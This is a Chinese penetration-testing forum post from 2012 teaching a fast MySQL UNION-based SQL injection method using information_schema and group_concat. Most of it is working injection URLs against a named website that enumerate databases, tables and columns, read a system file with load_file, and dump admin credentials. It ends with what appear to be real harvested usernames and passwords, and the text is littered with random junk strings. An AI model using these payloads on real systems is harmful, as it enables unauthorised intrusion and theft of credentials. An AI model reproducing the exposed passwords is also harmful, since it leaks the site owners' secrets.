中国网络渗透测试联盟
标题:
mysql注入高效方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:37
标题:
mysql注入高效方法
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
6 T# ?* a6 _( T) @
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
. F+ u9 X4 I8 @% W y* x
3 K8 G' [! ?/ u
" z) W/ M L Q5 @4 S1 P
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
; i3 a0 ]8 Z) R( `( E/ u0 u7 y9 b" Z9 p$ g
1 K0 E0 h( V' D( V
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
2 I6 ~9 n4 T, U* I
0 P# n! V E" { G( j
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
5 m& e S0 q N8 g" {: p0 G
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
5 [" |& g9 Y- T0 }+ h0 G
+ F' l E. R1 j& {
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
- [( }0 V* P8 a' K3 l
. _) l1 Y( X& b& d, T0 Q: ]
读出所有库:
& G: C% c, D8 r+ b
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
8 b* r# ] B: C/ \* o5 q' N
! g- i' w" c% @$ E/ R9 h# \
$ G+ W& U: Q- a- G4 I' g* J% r9 u3 H7 ~
! `. t$ H. ~5 J+ c/ }
读出所有表:
+ V! |' {7 F" ]4 u* d0 o6 m- F
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
7 V! U# D0 g' U# W
' R$ p) N: k9 x( \( A
读出所有表字段:
7 I+ l7 w6 h3 u* d, R/ P5 x; [
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
% v6 J/ g* K! r2 p8 H% ]2 q
*/ (97,100,109,105,110)为admin的ascii码 依次类推
9 }" k# _6 S9 @
E) P& O; I+ }
读出所有表字段里的内容:
. t. p$ ]: A; k& b& w
http://www.political-security.com/1.php?id=-1
union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
( s, M+ [" S% I& I9 L( \
+ X7 E( u8 w! U4 B- U
7 j! E% Z3 z, Z. b: Z/ v
) W5 `4 }# _# [3 a% d
% U' q7 W6 y& M
- K- N* h) V( S4 V" f
6 B, ~& D, J8 I4 l
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
2 G% Y, h6 T r% N7 I" b4 ?
+ w2 t( [7 V5 V i0 \& B( X
) A; @, K" B. v r
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
# Y7 d) A. e, W6 p v4 |
T R6 q! b$ _4 l$ d$ u
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
& L6 T/ q0 I9 v/ ?) a' ?$ C5 a
6 v* g7 e* I8 q# O
6 c$ g0 m4 E3 V# _; ^+ @( |
http://www.political-security.co ... ;&ssec=-1+UNION
SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
& T5 {4 ~# h! \0 a
7 i, S7 v. I" f3 E. _; S" w
1 ~, U l+ s% H/ j" C
webmaster:dzb521123,simlab:simadmin20043233
$ v! T L) u9 l8 K3 g2 o6 v. d* V
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2